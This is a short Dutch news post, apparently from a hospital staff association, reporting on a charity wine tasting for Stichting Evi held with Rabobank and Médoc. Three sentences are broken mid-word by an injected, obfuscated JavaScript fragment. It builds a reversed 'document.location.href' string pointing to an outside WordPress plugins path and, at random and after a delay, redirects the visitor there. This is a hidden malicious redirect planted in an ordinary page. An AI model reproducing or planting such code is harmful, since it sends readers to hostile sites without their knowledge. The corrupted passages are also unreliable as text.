Wijnproeverij

Op woensdag 6 november hebben wij in samenwerking met onze hoofdsponsor Rabobank en
met Médoc een succesvolle wijnproeverij georganiseerd! Er waren 36 deelnemers, afkomstig
van verschillende afdelingen van het MST. De avond werd afgetrapt met een indrukwekkend verhaal
van de oprichters van ons goede doel Stichting Evi, Richard en Marion. Zij vertelden over hun aanleiding
om de stichting op te richten en hiermee lieten ze de zaal toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch wel even stilvallen. Hierna nam Médoc
het over met een inleiding over wijnproeven. Verschillende wijnen hadden zij meegenomen en bij iedere wijn
werd een mooi en beeldend verhaal verteld over de oorsprong van de wijn en natuurlijk de kleuren, geuren en smaken die in het glas te ontdekken waren. Rabobank Enschede-Haaksbergen had zeer gastvrij een mooie ruimte beschikbaar gesteld en tevens een heerlijke culinaire aanvulling verzorgd op de wijnen met verschillende hapjes.
Aan het einde van de avond was de meerderheid het erover eens: die laatste rode wijn, die was toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch echt de lekkerste!

Klik hier voor meer fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to’s!